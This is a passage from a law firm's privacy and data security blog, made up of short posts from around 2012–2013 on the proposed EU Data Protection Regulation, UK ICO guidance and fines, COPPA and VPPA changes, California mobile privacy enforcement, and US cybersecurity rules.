The Irish government, which currently holds the EU presidency, also expressed concern at a Justice Council meeting in Dublin, suggesting that the household exemption (which permits individuals processing data as part of purely personal activity) and the right to be forgotten are unrealistic. While the Irish have previously said that the proposed Regulation is a priority they would like to see passed during their EU term of presidency, the draft Regulation is continuing to prove highly contentious, and any effort to further constrain business is likely to meet with resistance from some Member States as well as industry.
 

The European Network and Information Security Agency (ENISA) publishes report on the 'Right To Be Forgotten'

This post was written by Cynthia O'Donoghue.

The "right to be forgotten" as contained in the EU Commission’s Proposed Data Protection Regulation (Proposed Regulation) enhances the existing right to data erasure by adding an obligation on data controllers that have made personal data public to inform third parties, at the data subject's request, that they should erase any links to, or copies or replications of, personal data the individual no longer wishes to be public on online services. How this new right may be implemented is far from straightforward, and the European Network and Information Security Agency (ENISA) has exposed many of the technical difficulties of its implementation in a report, “The right to be forgotten – between expectations and practice.”

A fundamental concern raised by ENISA is the broad scope of the definition of personal data. In addition, ENISA warns that the draft regulation is not specific enough with regard to who has the right to request the deletion of data. This can become complex in certain circumstances, especially in the context of multiple data subjects with divergent viewpoints on deletion. Although difficult to administer, according to ENISA, there is an obvious need to establish who gets to decide in these situations.

ENISA also finds the definition of "forgotten" data problematic, asking whether it is enough to simply make the data inaccessible to the public or whether it requires absolute deletion. Concerns are raised about the complexities involved in deleting personal data from large data sets or “Big Data,” especially where it may be possible to re-identify individuals from data held in large data sets. ENISA also points out that research which depends on aggregated and derived forms of information (e.g., statistics) may be undermined if elements of the raw data from which the data set is derived are forgotten.

Because of the Internet’s openly accessible nature, once information is published it becomes impossible to prevent unauthorised copying of the information, making it difficult, if not impossible, to locate all copies of it. Enforcement of the right to be forgotten solely through technical means or through requests to "take down" information is therefore unlikely to be feasible. ENISA suggests that technical enforcement would need to be supplemented by international legal provisions aimed at making it difficult to find personal data, for instance, by requiring search engines to filter references to forgotten data from their search results.

Although ENISA steers clear of opining on the merit of a right to be forgotten, the report demonstrates that reliance on technical means to comply with the right, should it be implemented, requires a clearer definition of the scope of personal data, a clarification of who has the right to ask for deletion, and a statement of under which circumstances and by what methods data can be considered "forgotten." The ENISA report shows that a technical solution by itself is impossible, and that further refinement by policymakers and data protection authorities is required if the right to be forgotten is to operate effectively should it be implemented.
 

UK Information Commissioner fines company distributing spam texts for illegal marketing

This post was written by Cynthia O'Donoghue.

In a clampdown on the UK’s growing illegal telemarketing, the Information Commissioner's Office (ICO) issued its first monetary penalties under the Privacy and Electronic Communications Regulations 2011 (PECR) in November.

Following an 18-month investigation, Christopher Niebel and Gary McNeish of Tetrus Telecoms were fined £300,000 and £140,000 respectively for distributing up to 840,000 illegal spam marketing texts per day over the past three years. By doing so, they violated the PECR rules by failing to identify themselves as marketers and by not offering an opt-out mechanism for recipients. When recipients responded, even by texting "stop," the pair allegedly sold the personal data to claims-management agencies.

The ICO recommends that the public does not respond and instead deletes the messages. If an individual replies positively to a message offering compensation for a road accident or mis-sold Payment Protection Insurance (PPI), their personal information will be passed to a claims-management company, which can then receive substantial commission by selling their case to a solicitor.

Despite having issued these punitive fines, the ICO claims to continue to receive complaints, is considering issuing a further three penalties to companies engaged in illegal marketing activities, and is currently carrying out five separate investigations.

The Arrival of the OCR HIPAA/HITECH Final Rule is Here

This post was written by Brad M. Rostolsky and Nancy E. Bonifant.

The long awaited final rule, released yesterday by the Office for Civil Rights (OCR) of the Department of Health and Human Services, modifies the HIPAA Privacy, Security, Breach and Enforcement Rules and is comprised of four final rules which implement the statutory requirements of the Health Information Technology for Economic and Clinical Health Act (HITECH) and the Genetic Information Nondiscrimination Act (GINA).

Please click here for a more detailed analysis on our sister blog, Health Industry Washington Watch.

President Signs Amendment to Video Privacy Protection Act, Ushering in a New Era for Widespread Sharing of Viewing Histories

This post was written by Lisa B. Kim, Paul Bond, John P. Feldman, Christine E. Nielsen and Frederick Lah.

On January 10, 2013, President Obama signed the Video Privacy Protection Act Amendments Act of 2012 (“VPPAA”), which makes it easier for companies to obtain consumer consent to share video viewing information. At the same time, the amendment left in place many of the pitfalls traditionally associated with the VPPA, and added some new ones.

More specifically, the VPPAA makes the following changes:

  1. Consent Via Internet: It clarifies that a company can obtain informed, written consent to disclose the consumer’s video viewing information through electronic means, such as by the consumer signing an agreement over the Internet
  2. Consent Must Be Separate And Distinct: It requires that such consent be in a form “distinct and separate” from any form setting forth other legal or financial obligations of the consumer
  3. Consent Can Be Given In Advance: It allows consent to be given in advance for a set period of time, not to exceed two years, or until consent is withdrawn by the consumer, whichever is sooner
  4. Consent Can Be Withdrawn: It requires the company to provide an opportunity for the consumer to withdraw consent on a case-by-case basis, or to withdraw from ongoing disclosures, at the consumer's election

Previously, the VPPA had not allowed for advance consent to sharing. Since all disclosures had to be consented to “at the time” of disclosure, companies could not even obtain consent to sharing video history by way of their account formation documents or terms of use. Because of this Amendment, it is now possible for video content platforms to obtain valid, upfront consent from all of their customers to share individual video viewing histories with third parties. Properly done, this could result in a substantial benefit both to the sharing company and to the consumer, who will receive more highly personalized marketing offers. And consumers will retain an opt-out as of right.

But this benefit is not without its dangers. The Amendment imposes many requirements both for obtaining advance consent and for allowing revocation of consent. Many nuts-and-bolts questions concerning how to meet these requirements are left unanswered by the plain text of the amendment. When is a consent form sufficiently “separate and distinct”? Can a company require consent for video history sharing as a take-it-or-leave-it term of using the service at all? What does it mean that the customer must be allowed to withdraw consent “on a case-by-case basis”? Given that the VPPA provides for a private cause of action, statutory penalties of $2,500 per person, attorneys’ fees, and punitive damages, any failure to comply with these new consent provisions (which are surely not defined by case law yet), could expose a company to significant liability.

All companies looking to take advantage of this Amendment should carefully consider the design and operation of their consent mechanisms, drawing not only from the Act, but from all relevant sources of guidance as well.

Mobile Privacy Best Practices: California Continues To Push Compliance

This post was written by Joshua B. Marker, Steven Boranian, and Timothy Nagle.

With the start of the new year, California has continued its push to take a leadership role in the realm of mobile privacy. The attorney general’s office recently released a mobile privacy best practices document, “Privacy On The Go: Recommendations For The Mobile Ecosystem,” designed to help all actors in the mobile environment understand and incorporate privacy principles from the outset. As with last year’s agreement with the application platform companies, this document aims to increase privacy compliance through voluntary participation. This is in contrast to the enforcement action, which we previously wrote about, filed by the attorney general against Delta Airlines last month.

The report has recommendations for all participants in the mobile ecosystem, including the application platform providers, advertising networks, operating system developers, and mobile carriers. But its main focus is on application developers, those individuals or companies who are actually developing the applications with which consumers interact directly.

The recommendations made are generally at a high-level, and reinforce principles that have been introduced over the past few years, including privacy-by-design, and accessibility of a privacy policy within the application itself. In order to incorporate privacy from the outset, it is suggested that a developer should start with a “data checklist.” This checklist is a series of questions that any person or company developing an application should be asking at the beginning of the process: What type of data is the application collecting? Is this data necessary for the application’s basic functionality? How is the data used and stored?

Additionally, the report acknowledges that its recommendations go beyond what the minimum legal requirements are today, and provides a glimpse of where privacy principles are headed. For example, the report introduces a concept referred to as “surprise minimization,” which essentially means that an application should minimize any unexpected privacy practices, such as the collection of information not needed for the application’s functionality. Beyond just the existence of a privacy policy, the report suggests using an easy-to-understand format, such as a layered privacy notice, or a “nutrition label for privacy.” Further, you may want to consider the use of special notices that are presented when the application uses or collects information that is outside of what is required for basic functionality, such as geo-location data. Finally, the report reflects an ever-expanding definition of personally identifiable information, some of which is unique to the mobile ecosystem, including unique device identifiers, and geo-location data, as well as a history of applications downloaded or used.

California’s best practices document provides much more information, and is a quick but useful read for any company that has, or will have, a consumer-facing mobile application. At the very least, it will provide you with the right questions to ask to ensure mobile privacy compliance in California.

Cybersecurity Executive Order: A Shift to Implementation Over Participation

This post was written by Timothy J. Nagle.

An earlier blog post analyzed a draft Executive Order on critical infrastructure cybersecurity. A newer version of the order is similar to its predecessor, but the ultimate goals remain: using existing regulatory authority, improving information sharing, developing a “voluntary” framework of standards, incentivizing (or punishing?) owners and operators of critical infrastructure, and protecting privacy and civil liberties. All owners and operators may be impacted, but those that are specifically targeted by threats, or that present catastrophic consequences if their function is interrupted, should expect to change their business and compliance processes.

Please click here to read the issued Client Alert.

Defense Contractors Are Now Subject to Notice Requirements for Hacked Systems

This post was written by Gunjan Talati and Timothy Nagle.

The 2013 National Defense Authorization Act (“NDAA”) became the law of the land in early January. This NDAA contains a notice requirement that follows the government trend of the past few years of being required to tattle on yourself. Specifically, the NDAA directs the Department of Defense (“DoD”) to create notice requirements that mandate notification by “cleared” defense contractors to the government if covered networks are successfully penetrated.

A lot of uncertainty surrounds how the DoD will implement these notice requirements and exactly what they will cover. The NDAA explains that the Under Secretary of Defense for Intelligence (in conjunction with other enumerated officials) “shall establish the criteria for designating the cleared defense contractors’ networks or information systems that contain or process information created by or for the [DoD] to be subject to the reporting [requirements].” Thus, the NDAA gives the DoD significant discretion in determining what networks and systems will be covered, and whether unclassified networks and systems will be included.

The NDAA also gives the DoD broad discretion with the procedure for reporting, requiring only that the reporting be “rapid.” The NDAA does, however, outline certain elements a report must have, such as how the system was penetrated, and a sample of the malicious code if available.

The law also requires the DoD to establish a process that gives DoD personnel the authority to access “equipment or information of a contractor necessary to conduct a forensic analysis” to determine if any DoD information was “exfiltrated” by the hack. While the language of the statute appears to limit the access of the DoD to simply determining if information was “exfiltrated,” the actual procedures proposed by the DoD may be a different story. If the DoD drafts procedures that go beyond just determining what was “exfiltrated,” companies will have to grapple with a number of issues, such as the inadvertent release of trade secrets, DoD access to privileged records, and attorney/client communications. As is almost always the case, the true devil will be in the details.

The EU Commission declares New Zealand adequate for the transfer of personal data

This post was written by Cynthia O'Donoghue.

On 19 December 2012, following years of assessment and culminating in positive recommendations by two specialist EU Committees, the European Commission formally announced that New Zealand’s data protection standards are compatible with those of the EU, and that they ensure “adequate protection” of personal data under the European Data Protection Directive 95/46/EC. Vice-President Viviane Reding, the European Commissioner for Justice, Fundamental Rights and Citizenship, declared that the decision paved the way to boosting trade with the EU’s international partners, while helping to set high standards for personal data protection at a global level.

Under the European Data Protection Directive, transfers of personal data to countries outside the European Economic Area that are not considered to provide “adequate protection” of personal data are subject to strict conditions under which adequate safeguards must be put in place in order to allow for the international transfer. This finding of adequacy will therefore allow personal data to flow from the 27 EU member states to New Zealand for processing without any further safeguards being necessary.

To date, the European Commission has recognised Andorra, Argentina, Australia, Canada, Faeroe Islands, Guernsey, Israel, Isle of Man, Jersey, New Zealand, Switzerland and Uruguay, and the United States’ Safe Harbor scheme, as providing adequate protection.
 

OCC Issues Alert in Response to Recent DDoS Events

This post was written by Timothy J. Nagle.

On December 21, 2012, the Comptroller of the Currency issued Alert 2012-16 regarding “Distributed Denial of Service (DDoS) Attacks and Customer Account Fraud.” The Alert was in response to a recent series of attacks against national banks and federal savings associations by “various sophisticated groups.” It provides a general description of the attacks and recommendations for appropriate risk management measures. Financial institution clients should pay particular attention to comments in the Alert regarding staffing, vendor due diligence, reporting to law enforcement, and the need for effective communication with customers.

A DDoS attack does not, by itself, constitute a security breach. Rather, it interrupts or severely degrades Internet access, particularly to online banking sites. However, a DDoS attack is frequently accompanied by “account takeover” fraud while the bank is focused on responding to the DDoS event. The Alert emphasizes the need for “a heightened sense of awareness” to prepare for and respond to these attacks, which show no sign of diminishing in frequency or sophistication. Preparations may include reviewing staffing requirements, contracting with third-party servicers to assist in managing the Internet traffic flow, and conducting due diligence reviews of vendors – such as Internet Service Providers and website hosting companies – to ensure they have taken adequate steps to address this threat.

Another aspect of DDoS preparation and response is sharing information with other banks and service providers, either directly or by participating in organizations such as the Financial Services Information Sharing and Analysis Center (FS-ISAC). Banks are also expected to report attacks to law enforcement and regulators, as well as file Suspicious Activity Reports if critical information or systems are impacted. Possibly the most important action during a DDoS event, as identified by the Comptroller of the Currency, is “timely and accurate communication to...customers regarding Web site problems, risks to customers, precautions customers can take, and alternate delivery channels that will meet their banking needs.” This admonition may have been in response to media reports of customers who expressed frustration with financial institutions for a perceived failure to notify them of the possibility that online banking and other websites may be impacted.

Awaiting the Release of the HITECH Final Rule

This post was written by Brad M. Rostolsky and Nancy E. Bonifant.

As the year comes to an end, the industry is speculating about the release date of the Health Information Technology for Economic and Clinical Health Act (“HITECH”) final rule. The final rule is expected to address modifications to the Privacy, Security, Enforcement, and Breach Notification Rules, and with the release date yet to be determined, it is important for Covered Entities and Business Associates to be prepared for the upcoming changes.

Please click here for a more detailed analysis on our sister blog, Life Sciences Legal Update.

Right on Time: FTC Announces COPPA Update

This post was written by John P. Feldman and Frederick Lah.

Earlier today, FTC Chairman Leibowitz announced the agency’s update to the COPPA rule at a press conference alongside Sens. Jay Rockefeller (D-W.Va.) and Mark Pryor (D-Ark.), and Congressmen Ed Markey (D-Mass.) and Joe Barton (R-Tex.). The changes to COPPA were two years in the making and were the result of two proposed rule revisions and comment periods. As anticipated, the new rule comes with a broadened scope. Sen. Rockefeller provided the opening remarks to the press conference, expressing his approval that the new COPPA rule “captures the new online reality” to address the rise of social networks, smartphones, tablets, and apps. Some highlights from the new COPPA rule include:

  • Expanded scope of personal information – the collection of which requires parental notice and consent – to include geolocation information, photographs, and videos. The chairman noted that this kind of information can be used to cause physical harm to children.
  • Expanded scope of personal information to also include persistent identifiers, such as mobile device unique identifiers and IP addresses, to the extent they can recognize users over time and across different websites. Chairman Leibowitz noted that these types of information can be used to build massive profiles by behavioral marketers. The definition would not be extended to include persistent identifiers if they are used for the sole purpose of supporting the site or its internal operations.
  • Closed a “loophole” that allowed covered websites or online services to permit third parties to collect personal information through plug-ins or ad networks that the covered websites or online services would not have otherwise been allowed to collect without parental consent. Third-party collectors are now also required to comply with COPPA if they have “actual knowledge” of the child-directed nature of the site from which they are collecting personal information.
  • Offered companies a “streamlined, voluntary and transparent” approval process for new ways of getting parental consent. The chairman encouraged companies to create additional “simple, low-cost means” of obtaining verifiable parental consent.
  • Strengthened data security protections by requiring that covered websites or online services take reasonable steps to release children’s personal information only to companies that are capable of keeping it secure and confidential.
  • Strengthened requirement that covered websites or online services adopt reasonable procedures for data retention and deletion, and the FTC’s oversight of self-regulatory safe harbor programs.

Notably, the chairman said that advertisers can continue to advertise to children without parental consent, but may not engage in behavioral advertising without it. The chairman bluntly stated: “Until and unless you get parental consent, you may not track children to build massive profiles for behavioral advertising principles. Period.”

The amendments are expected to come into effect July 1, 2013. Companies need to consider these amendments now, both with respect to their operations for websites and in the mobile space. This is especially true considering the FTC’s recent focus on children’s privacy in the mobile app environment. We will continue to follow this issue closely.


Addressing the uncertainty over Germany's consent requirement for advertising

This post was written by Katharina A. Weimer.

In a recent article for Privacy Laws & Business International Report, Reed Smith’s Katharina Weimer explains how to reach your customers now that the grace period for amendments to the German Data Protection Act has expired.

Please click here to continue reading.

More News on COPPA...

This post was written by John P. Feldman and Frederick Lah.

One day after the FTC issued its second report on privacy concerns with mobile apps for kids, "Mobile Apps for Kids: Disclosures Still Not Making the Grade", a consumer privacy group filed a complaint with the FTC against a mobile game-maker for alleged violations of COPPA. The complaint, filed by the Center for Digital Democracy, alleged that the mobile game-maker was collecting children’s personal information through its mobile game without obtaining verifiable parental consent, and without providing the requisite notice under COPPA.

As actions continue to be brought under the current COPPA regime, we’re expecting the new COPPA rules to be issued any day now. In a recent interview, Chairman Leibowitz noted that he was "pretty sure" that the new COPPA rules would be finalized by the end of the year (while sounding less optimistic that a Do-Not-Track deal would be reached in the same time frame). We will continue to monitor this issue closely in the coming weeks.

FTC Issues Second Report on Privacy Concerns with Mobile Apps for Kids

This post was written by John P. Feldman and Frederick Lah.

It continues to be a busy time in the world of mobile app privacy. Last week, we reported on the California attorney general bringing a mobile privacy enforcement action against Delta Air Lines. And just yesterday, the FTC issued its second staff report on the privacy practices of mobile apps for children, “Mobile Apps for Kids: Disclosures Still Not Making the Grade.”

This report reiterates some of the findings from the FTC’s first report on the privacy practices of mobile apps for children, “Mobile Apps for Kids: Current Privacy Disclosures are Disappointing.” The FTC continues to voice its dissatisfaction with the current privacy disclosures that companies are providing to parents, such as what type of data the app collects, who will have access to that data, how the data will be used, and who that data will be shared with. The FTC continues to believe that such disclosures should be provided prior to download since once an app is downloaded, the app may already be collecting the child’s information.

The basis of the second report was again a survey of approximately 400 apps, 200 each from the Apple and Google Play app stores. According to the survey, only 20 percent of the apps reviewed contained any privacy-related disclosures at all, whether on the app’s promotion page, on the developer website, or within the app. In addition, the FTC’s survey found that:

  • 59 percent of the apps reviewed transmitted device ID, geolocation, or phone number to the developer, an advertising network, analytics company or other third party, yet only 11 percent of the apps disclosed that the app transmitted such data.
  • 58 percent of the apps reviewed contained advertising within the app, yet only 9 percent disclosed that the app contained advertising.
  • 22 percent of the apps reviewed contained links to social media, yet only 9 percent disclosed that fact.

The FTC intends to conduct another survey in the future, and they “expect to see improvement.” They noted that such discrepancies between a company’s privacy practices and disclosures could constitute violations of COPPA or the FTC Act. With the FTC’s continued focus in this area and the proposed COPPA rules expected to be implemented shortly, we anticipate that the intersection between mobile apps and children’s privacy will continue to draw heightened regulatory scrutiny. In the meantime, we recommend that companies operating in the mobile space (especially those providing apps for children) review and update their mobile app privacy disclosures now before they become the next enforcement target.

Big Data Goes to Princeton for Inaugural Meeting of IAPP's New Jersey KnowledgeNet

This post was written by Paul Bond, Mark Melodia and Cynthia O'Donoghue.

The International Association of Privacy Professionals hosted its first KnowledgeNet in New Jersey December 6, 2012, at the Princeton offices of Reed Smith. Reed Smith attorneys Mark Melodia and Paul Bond presented a seminar on “Understanding and Defending Big Data” to the gathering of dozens of privacy attorneys and privacy compliance professionals from around the state. Participants discussed what Big Data means to them, as well as how Big Data solutions are being deployed in their respective industries, including financial services, health care, energy, and education. This KnowledgeNet, organized by Miranda Alfonso-Williams, Global Privacy Leader, GE Healthcare, promises to be the first of many for the growing privacy community of the Garden State.

In October, Reed Smith hosted a Silicon Valley event on “Big Data Monetization.” Video of the presentations from that panel, including Mark, and Data Privacy, Security & Management Group co-chair Cynthia O’Donoghue, are available here.

California Mobile Privacy Enforcement Takes Flight; All Companies Offering Mobile Apps to Consumers Should Prepare for Landing

This post was written by Steven Boranian, Joshua Marker and Paul Bond.

Following a year in which she repeatedly announced her intention to make mobile privacy a priority, California Attorney General Kamala Harris filed the first mobile privacy enforcement action against Delta Air Lines. The case, The People Of The State Of California v. Delta Air Lines, CGC-12-526741, filed in San Francisco Superior Court December 6, 2012, alleges violations of California’s Unfair Competition Law based upon Delta’s alleged failure to comply with the California Online Privacy Protection Act (“CalOPPA”). With potential statutory penalties of $2,500 per violation, the stakes are sky high.

Delta had received a letter from the attorney general’s office in late October notifying the company of non-compliance with CalOPPA, and giving it 30 days to become compliant. In particular, the letter noted that the Fly Delta app “does not have a privacy policy reasonably accessible for consumers.” With the expiration of the 30-day period, the attorney general wasted no time in filing the current action. While the case is notable for being the first mobile privacy enforcement action, it is equally notable for the violations that it alleges.

The primary allegations are twofold. First, the complaint repeats the allegation of the letter, that Delta does not have a privacy policy for its mobile application that is readily accessible to the consumer in the application or on the platforms from which it could be downloaded, an alleged CalOPPA violation in its own right. Second, the complaint alleges that neither the presence, nor the substance, of the Delta website privacy policy is sufficient for compliance with CalOPPA with respect to the mobile application. Critically, the complaint alleges that “while the privacy policy on Delta’s website describes some of the PII collected on their website, Delta does not disclose anywhere several types of PII that the Fly Delta app collects, but the Delta website does not collect.” In short, the attorney general is not just paying attention to the presence of the privacy policy, but also the content and the information practices unique to the mobile environment.

Any company that has a consumer-facing mobile application should take note. Per the attorney general, every mobile application that collects personally identifiable information must have a privacy policy that is readily available to the consumer on the platforms on which the application is available for download, and within the application itself. Just as important, the attorney general is urging that each privacy policy must disclose the information-collection and sharing practices of the mobile application specifically, and that it is not sufficient to simply link to the website privacy policy. Information-collection practices often vary between website and mobile applications, and the privacy policy must be an accurate reflection of the information-collection and sharing practices in the application.

Data Protection Concessions for SMEs hinted at by EU Justice Commissioner

This post was written by Cynthia O'Donoghue.

Viviane Reding, Vice-President of the European Commission, EU Justice Commissioner, told ministers from the European Union Member States at a Justice and Home Affairs Council meeting in Luxembourg that in an effort not to overburden small and medium-sized enterprises (SMEs), she is prepared to offer them some concessions under the revised EU Data Protection Regulation.

SMEs are currently exempt from certain requirements, including the appointment of a data protection officer, but the Commission is prepared to consider broadening this exemption to other areas through an approach that takes into account the amount and sensitivity of the data processed. The proposal further elucidates the Commission's intention to not apply the same rules to “the small hairdresser as to a multinational.”

Reding emphasised that the Commission would not fall into the trap set by some lobbyists who express concerns for SMEs but are in fact referring to provisions designed to help large multinational firms.

In her speech, the Commissioner also referred to the proposed implementing and delegated acts, expressing that they are not designed to be considered a “blank cheque” for the Commission. Instead, Reding suggested she would consider reviewing them one-by-one with member states to ensure they are limited to what is truly necessary.

Reding also hinted that there may be different rules for the private and public sectors, by advocating the need for greater flexibility, even though the consensus is to stick to the status quo of having the same rules apply to both. However, Reding stated that “specific rules are necessary in certain circumstances such as the land registry which should be public.” But she warned that “there can be no general exemption for the public sector.”

It’s looking increasingly unlikely that the EU Data Protection Regulation will be revised and ready for a vote during the first quarter of next year, despite the Irish Presidency’s hope to get it on the agenda for February 2013.

The UK Justice Committee critiques the European Union's proposed Data Protection Framework

This post was written by Cynthia O'Donoghue.

The UK Justice Committee has laid out its concerns in its opinion on the European Commission’s legislative proposals (the Proposal) for reform of the European Data Protection Framework. In forming its judgement, the Justice Committee heard evidence from: the Ministry of Justice, the Information Commissioner’s Office, the EU Commission, the police, and representatives of UK small and medium enterprises (SMEs) and global businesses.

Whilst accepting that the proposed Regulation is necessary to update the original 1995 Directive to take into account technological change and to confer on individuals their new rights and freedoms, the Committee criticized its “over-prescriptive” nature and called for changes to be made.

A fundamental concern for the Committee was the division of the Proposal between a Regulation for all, and law enforcement which would be governed by national implementing legislation stemming from the proposed Directive. The Committee felt that this could “cause confusion for data subjects and in particular for organisations within the criminal justice system”, as well as a lack of consistency resulting from a weakness in the proposed Directive as compared with the proposed Regulation. The Committee strongly urged the Commission to choose between either focussing on elements essential to harmonisation under a Regulation, or using a Directive to allow implementation by Member States which would provide greater flexibility in implementation and enforcement at the cost of harmonisation and consistency.

The Committee also opined on a number of crucial provisions within the framework, broadly supporting the “right to be forgotten” but warning that using the word "forgotten" could create unrealistic expectations, especially for users of social media. Individuals’ right to access their own data was also a point of contention, with the Committee recommending that the proposed Regulation should ban any fee for data access requests. Furthermore, the Committee has suggested that the requirement to appoint a Data Protection Officer for those organisations with more than 250 employees should be changed to take into account the type of business and the sensitivity of data that is handled, rather than the number of employees.

The Justice Committee agreed with the criticism levelled at the Commission’s Impact Assessment, which failed to account for additional compliance costs that may be incurred by organisations, although the Committee acknowledged that the new Data Protection Framework had the potential to increase competitive advantage through increased consumer confidence.

Overall the Committee agreed that the Regulation does give data subjects essential rights and has the potential to make data protection compliance easier for businesses, especially SMEs, after EU Justice Commissioner Viviane Reding recently announced that she is prepared to offer them some concessions under the framework. However, the Committee does not believe that in its current form it will produce a proportionate, practicable, affordable or effective system of data protection in the EU.

ICO change to notification process

This post was written by Cynthia O'Donoghue.

The Information Commissioner’s Office (ICO) has published a public consultation on changes to the notification process for organisations processing personal data. Currently, data controllers are required to submit and annually renew their notification with the ICO, describing the purposes of their personal data processing according to standard definitions.

In an attempt to simplify the notification process, the ICO is consulting the public and data controllers on the following proposed changes:

  • introducing an online and telephone service for the payment and renewal of notification fees;
  • identifying in the notification form the contact details the data controller would like the public to use when requesting information or submitting other data protection enquiries; and
  • introducing a narrative-based approach in relation to the purposes of processing where a data controller will be able to describe in their own words how they process personal data.

Although certain standard templates will still be available, the move towards a narrative-based approach is considered by the ICO as the best way to make the “public register more helpful and accessible.”

There are several concerns with a narrative approach: it is more onerous on data controllers, and it may lead to a lack of consistency between data controllers, resulting in confusion for individuals. The consultation closes 30 November.


ICO publishes guide on Anonymisation in the UK

This post was written by Cynthia O'Donoghue.

The UK Information Commissioner's Office (ICO) has published a code of good practice on managing the risks related to anonymisation. Christopher Graham, UK Information Commissioner, believes this to be the first code of practice on anonymisation to be published by any European data protection authority, but Liechtenstein published a guide on anonymisation and pseudonymisation earlier this year.

With publicly available data increasing rapidly and the rise of “big-data,” anonymisation is an important tool in “helping society to make rich data resources available whilst protecting individuals’ privacy.” It is considered to be of particular value for organisations that want to publish data for research purposes.

The Code was issued pursuant to Recital 26 of the European Data Protection Directive (Directive 95/46/EC), which provides that “the principles of protection shall not apply to data rendered anonymous in such a way that the data subject is no longer identifiable.” Data that is properly anonymised ensures that an individual can no longer be identified, resulting in such data falling outside the European data protection laws. Anonymisation is not, however, always straightforward since individuals may be identified in a number of ways which can lead to the possibility of re-identifying individuals from a combination of anonymised data and data aggregated from other sources. The ICO recognises the difficulty in determining whether anonymised data is still classified as personal data and believes a sensible judgment should be made in the circumstances.

The Code recommends that data controllers perform regular risk assessments on the likely occurrence of re-identification since that risk may change over time. It further warns that even if anonymisation is carried out effectively, it does not necessarily protect personal data from being re-identified in the future. In borderline cases where there is uncertainty about whether re-identification can occur, organisations are urged to seek the individual’s consent for disclosure and to adopt a more rigorous form of risk analysis and anonymisation.

Disclosure of anonymised data does not require consent, according to the ICO: “provided there is no likelihood of anonymisation causing unwarranted damage or distress then there will be no need to obtain consent as a means of legitimising the processing.” The ICO also acknowledged that consent can be not only onerous but potentially impossible to obtain, and that, even where it can be obtained, the ICO generally considers it safer to use or disclose anonymised data.

The Information Commissioner does, however, suggest an added layer of bureaucracy and cost for organisations, by recommending that risk assessment strategies form part of an organisation’s wider governance structure, with the appointment of a “Senior Information Risk Owner” who would be responsible for authorising and overseeing the anonymisation process.

Indian Government Official asks EU to declare India an adequate country for data transfers

This post was written by Cynthia O’Donoghue.

Shri Anand Sharma, Union Minister for Commerce, Industry & Textiles in India, emphasised, at a bilateral meeting with the European Commissioner for Taxation and Customs Union, that in order for the Bilateral Trade and Investment Agreement (BTIA) between the EU and India to be successful, India must be declared an adequate country for data transfers.

Shri Sharma indicated that India wishes to boost bilateral trade with the EU, seeking greater market access to the lucrative services sector. The Minister illustrated India’s strong investment appeal through its flexible Foreign Direct Investment (FDI) conditions, which have led to FDI inflows of $46 million since last year, an increase of nearly 35%.

The European Union is currently in the process of determining whether India’s laws meet an adequate level of data protection as stipulated by the EU Data Protection Directive. Shri Sharma acknowledged that India’s existing law does not meet the required EU standards, and he urged that the situation be rectified promptly in the wake of “almost all the major Fortune 500 companies (having) trusted India with their critical data”.

Colombia enacts Data Protection Law

This post was written by Cynthia O'Donoghue.

On October 17, 2012, Colombia enacted a new Data Protection Law which will regulate the collection and processing of personal data both within the Colombian territory and extraterritorially.

The law generally follows the EU approach including, amongst other provisions, cross-border data transfer restrictions where the destination country’s data protection is not deemed “adequate”, as well as the requirement for express and informed consent prior to processing of personal data.

The new law also prohibits processing special categories of data, including sensitive personal data, which has the same definition as within the EU, but adds a new category of ‘Minors and Teenage’ data, unless that data is deemed to be in the public domain.

Organisations have a period of six months from the date of enactment before they must be compliant with Colombia’s new data protection law.

FTC Releases Statement about Approval of FTC's Consent Decree with Google

This post was written by Frederick H. Lah and Douglas J. Wood.

Last week, the U.S. District Court approved the $22.5 million civil penalty against Google for violating a consent order. Yesterday, FTC Director of the Bureau of Consumer Protection David Vladeck released a statement about the Court’s approval, calling the consent order “a clear victory for consumers and privacy” and demonstrating that the Commission “will continue to ensure that its orders are obeyed, and that consumers’ privacy is protected.” The consent order settled charges that Google misrepresented privacy assurances to users of Apple’s Safari Internet browser in violation of a previous FTC settlement Order.

Please click here to read the full post on our sister blog, AdLaw By Request.


UK's ICO Seeks Input on Use of Privacy Seals

This post was written by Cynthia O'Donoghue.

The EU’s proposed Data Protection Framework encourages the use of privacy seals, certification mechanisms and trust marks. Any organisation which has obtained a privacy seal would be considered to have attained a ‘stamp of approval’, indicating good privacy standards.

Anticipating the development of data protection kite marks, the UK Information Commissioner’s Office has launched a questionnaire to help establish the best method of implementing such a scheme, and how privacy seals may be used to improve data protection compliance and consumer awareness of data protection.

The questionnaire will gather the views of organisations on their general interest in the use of privacy seals, practical experiences they have with such schemes, and the potential commercial benefits, as well as any potential reservations they may have.

As with any type of kite mark, the use of privacy seals must be founded on a system that can be trusted and perceived as legitimate. Experience with similar marks shows that a seal must not become nothing more than a formulaic paper exercise whose claims are not always supported by practice. Ideally, any kite marks developed and approved would also be attainable and recognised across the EU; otherwise they would be contrary to one of the main principles behind the draft EU Data Protection Regulation, that of increasing harmonisation.

UK Information Commissioner's Office Issues Cloud Guidance

This post was written by Cynthia O'Donoghue.

With a need for mobile access to data and the influx of innovative and affordable cloud computing products to global markets, organisations are shifting towards a greater use of the cloud. In response to its growing popularity, the Information Commissioner’s Office (ICO) has published guidelines on data protection compliance issues surrounding cloud computing. The practical guidelines not only provide a high-level analysis of how to apply data protection rules to cloud contracts, but also consider the various issues surrounding migration to the cloud and provide a checklist for those organisations adopting cloud services.

The distinction between data controller and data processor is of critical importance to data protection and can be complex in relation to cloud computing. The ICO helps navigate this issue by demonstrating data controller and processor roles in various scenarios. The cloud customer is generally considered the data controller as it determines the purposes and the manner in which any personal data are being processed. The ICO suggests that the precise role of the organisation that owns and operates the cloud service (“Cloud Provider”) should be reviewed in each case in order to determine whether or not it is processing personal data.

Data controllers, to remain compliant with the UK Data Protection Act, must consider the following key areas:

  • Security
    • Assess personal data and the risk to that data by putting it into the cloud.
    • Obtain sufficient guarantees from the cloud provider about security measures. The ICO supports the use of industry-recognised standards.
    • Protect personal data in transit through use of encryption, especially where sensitive data is being processed.
    • Ensure measures are in place to prevent unauthorised access, including individual usernames and passwords for each cloud user.
    • Institute a continual cycle of monitoring, review and assessment of the cloud provider’s security controls.
  • Data Retention and Deletion
    • As most cloud providers are likely to have multiple copies of data stored in various locations for disaster recovery, cloud customers should ensure that all copies of personal data no longer required can be deleted securely and in a timely manner.
  • Audit
    • If it is not possible to obtain audit rights because of shared cloud services, the ICO recommends an audit by an independent third party to avoid the need for each customer to conduct a separate audit.
